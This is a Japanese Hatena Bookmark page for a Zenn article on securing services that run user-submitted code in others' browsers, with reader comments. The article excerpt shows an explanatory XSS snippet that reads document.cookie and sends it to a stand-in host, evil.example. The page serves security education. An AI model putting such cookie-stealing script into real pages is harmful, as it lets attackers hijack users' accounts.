[フレーム]
はてなブックマークアプリ

サクサク読めて、
アプリ限定の機能も多数!

アプリで開く

気に入った記事をブックマーク

  • 気に入った記事を保存できます
    保存した記事の一覧は、はてなブックマークで確認・編集ができます
  • 記事を読んだ感想やメモを書き残せます
  • 非公開でブックマークすることもできます
適切な情報に変更

エントリーの編集

loading...

エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。

タイトルガイドライン

このページのオーナーなので以下のアクションを実行できます

タイトル、本文などの情報を
再取得することができます
コメントを非表示にできます コメント表示の設定

ブックマークしました

ここにツイート内容が記載されます https://b.hatena.ne.jp/URLはspanで囲んでください

Twitterで共有

ONにすると、次回以降このダイアログを飛ばしてTwitterに遷移します

244users がブックマーク コメント 15

ガイドラインをご確認の上、良識あるコメントにご協力ください

0 / 0
入力したタグを追加

現在プライベートモードです 設定を変更する

おすすめタグタグについて

よく使うタグ

ユーザー投稿のコードをブラウザ上で他人が動かせるサービスを作るときのセキュリティについて

244 users zenn.dev/catnose99

ガイドラインをご確認の上、良識あるコメントにご協力ください

0 / 0
入力したタグを追加

現在プライベートモードです 設定を変更する

おすすめタグタグについて

よく使うタグ

はてなブックマーク

はてなブックマークで
関心をシェアしよう

みんなの興味と感想が集まることで
新しい発見や、深堀りがもっと楽しく

ユーザー登録

アカウントをお持ちの方はログインページ

記事へのコメント15

  • 注目コメント
  • 新着コメント
kobito19
DreamCore https://x.com/catnose99/status/1948290964638024103

その他
sbrtnpg
全くセキュリティリスクに反応しない経営者の方も若いのかと思ったら、そっちは結構おじさんだった時の絶望感。

その他
haatenax
そもそもセキュリティの問題がクリアできないから存在しなかったサービスなのであって、その辺を軽視する人が憚る世の中はいかがなものか

その他
hurafula
知見

その他
ya--mada
ブラウザ内での分離やなど

その他
takatama
セキュリティ研修に使えるネタ

その他
psne
あのやつ

その他
secseek
そもそも怖いからそんなサービスを作りたくないってのはダメですかね...

その他
shoh8
はわわわわ

その他
hogetax
怖くて手が出せない分野。なんか元があるのか?

その他
tettekete37564
XSSの実例集として助かる

その他
sbrtnpg
sbrtnpg 全くセキュリティリスクに反応しない経営者の方も若いのかと思ったら、そっちは結構おじさんだった時の絶望感。

2025年07月25日 リンク

その他
Shinwiki
主語と述語が

その他
kobito19
kobito19 DreamCore https://x.com/catnose99/status/1948290964638024103

2025年07月25日 リンク

その他
ftype
CSPはやっておいたほうがいい

その他
ryudenx
この人プチンとキレたら徹底的にやるタイプなんだな

その他
mayumayu_nimolove
例の

その他

注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています

リンクを埋め込む

以下のコードをコピーしてサイトに埋め込むことができます

プレビュー
アプリのスクリーンショット
いまの話題をアプリでチェック!
  • バナー広告なし
  • ミュート機能あり
  • ダークモード搭載
アプリをダウンロード

関連記事

usersに達しました!

さんが1番目にブックマークした記事「ユーザー投稿のコ...」が注目されています。

気持ちをシェアしよう

ツイートする

ユーザー投稿のコードをブラウザ上で他人が動かせるサービスを作るときのセキュリティについて

問題1: 他ユーザーの認証情報にアクセスできてしまう 投稿されたコードを普通にサイト内に埋め込むとXSS... 問題1: 他ユーザーの認証情報にアクセスできてしまう 投稿されたコードを普通にサイト内に埋め込むとXSSがやり放題な状態になります。 認証CookieのHttpOnlyが無効になっている場合 ユーザーがたくさん集まる超面白いゲームを作り、その中に以下のようなコードをしれっと含めると、そのゲームを開いたユーザーのアカウントの乗っ取りが可能になります。 <script> // 1. Cookieを取得 const stolen = document.cookie; // 2. 攻撃者のサーバーに送信 const img = new Image(); img.src = "https://evil.example/steal?cookie=" + encodeURIComponent(stolen); </script> CookieのHttpOnly属性が無効になっていると、スクリプトからCo

ブックマークしたユーザー

  • stntaku2025年10月10日 stntaku
  • utgwkk2025年10月09日 utgwkk
  • fu9da2025年09月20日 fu9da
  • ikosin2025年09月01日 ikosin
  • miki_bene2025年08月19日 miki_bene
  • massans2025年07月31日 massans
  • hush_in2025年07月31日 hush_in
  • tmg19982025年07月29日 tmg1998
  • kamada-math2025年07月28日 kamada-math
  • okyawa2025年07月28日 okyawa
  • s_ryuuki2025年07月27日 s_ryuuki
  • midas365452025年07月27日 midas36545
  • rinrinbell2025年07月26日 rinrinbell
  • masayuki-as2025年07月26日 masayuki-as
  • igrep2025年07月26日 igrep
  • kesoy2025年07月26日 kesoy
  • tybalt2025年07月26日 tybalt
  • nemuki32025年07月26日 nemuki3
すべてのユーザーの
詳細を表示します

ブックマークしたすべてのユーザー

同じサイトの新着

同じサイトの新着をもっと読む

いま人気の記事

いま人気の記事をもっと読む

いま人気の記事 - テクノロジー

いま人気の記事 - テクノロジーをもっと読む

新着記事 - テクノロジー

新着記事 - テクノロジーをもっと読む

同時期にブックマークされた記事

いま人気の記事 - 企業メディア

企業メディアをもっと読む

はてなブックマーク

公式Twitter

はてなのサービス

Copyright © 2005-2025 Hatena. All Rights Reserved.
設定を変更しましたx

AltStyle によって変換されたページ (->オリジナル) /